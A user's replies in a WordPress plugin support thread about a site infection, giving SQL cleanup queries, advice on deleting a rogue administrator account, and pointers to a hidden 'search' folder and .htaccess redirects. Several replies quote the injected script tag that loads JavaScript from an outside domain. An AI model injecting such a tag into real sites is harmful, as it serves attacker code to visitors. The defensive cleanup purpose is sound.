Sethos12

Forum Replies Created

Viewing 3 replies - 1 through 3 (of 3 total)
  • Forum: Plugins
    In reply to: [Anti-Malware Security and Brute-Force Firewall] May be Malware attacks
    Sethos12

    (@sethos12)

    10 years, 8 months ago

    Use sql queries like this, replacing parts of this “<script type=’text/javascript’ src=’http://online-sale24.com/1.js’></script>&#8221;

    UPDATE wp_options SET option_value = replace(option_value, ‘<script’, ”) WHERE option_name = ‘home’ OR option_name = ‘siteurl’;

    UPDATE wp_posts SET guid = replace(guid, ‘<script’,”);

    UPDATE wp_posts SET post_content = replace(post_content, ‘<script’, ”);

    UPDATE wp_postmeta SET meta_value = replace(meta_value, ‘<script’, ”);

    Forum: Plugins
    In reply to: [Anti-Malware Security and Brute-Force Firewall] May be Malware attacks
    Sethos12

    (@sethos12)

    10 years, 8 months ago

    I have also found inside the Users, in wordpress admin, another user created by the vyrus:

    Username: tEEebe777811, email: [email protected]

    You should delete this user from the DB itself, it’s safer that way. Change your administrator password as soon as possible. Basically the virus could administrate your website as it pleased as it had administrator role inside the admin of your website.

    I have also searched for “online-sale” inside my db and i have found over 50 articles containing this script:

    <script type=’text/javascript’ src=’http://online-sale24.com/1.js’></script&gt;

    So you should check this too. This attack is far more complex than I thought.

    I hope I helped you find a way to remove it.

    Forum: Plugins
    In reply to: [Anti-Malware Security and Brute-Force Firewall] May be Malware attacks
    Sethos12

    (@sethos12)

    10 years, 8 months ago

    Hi all,

    I faced the same problem as you all did. After hours and days of searching I found, by myself, out of a mistake the source of this vyrus.

    First, in the root of my website I found a folder called “search”.

    It contains a folder called “cache” and a file called “search.php” and a .htaccess file.

    Inside the cache folder of this search folder, there are 5 other folders called:
    css
    html
    jpg
    js
    xml

    Basically, the vyrus gets built out of this folder. I also found some redirects in my root’s .htaccess file, but very very low down in the file. So search very carefully, it’s below what you can firs see.

    I will not post the contents of search.php as I don’t want to create any problems to this website.

    So, I hope I helped you a bit and best regards to you all. Delete this “search” folder and the weird redirects in your .htaccess and everything should be fine. You could also check your theme’s header.php, just in case.

    Best regards,

Viewing 3 replies - 1 through 3 (of 3 total)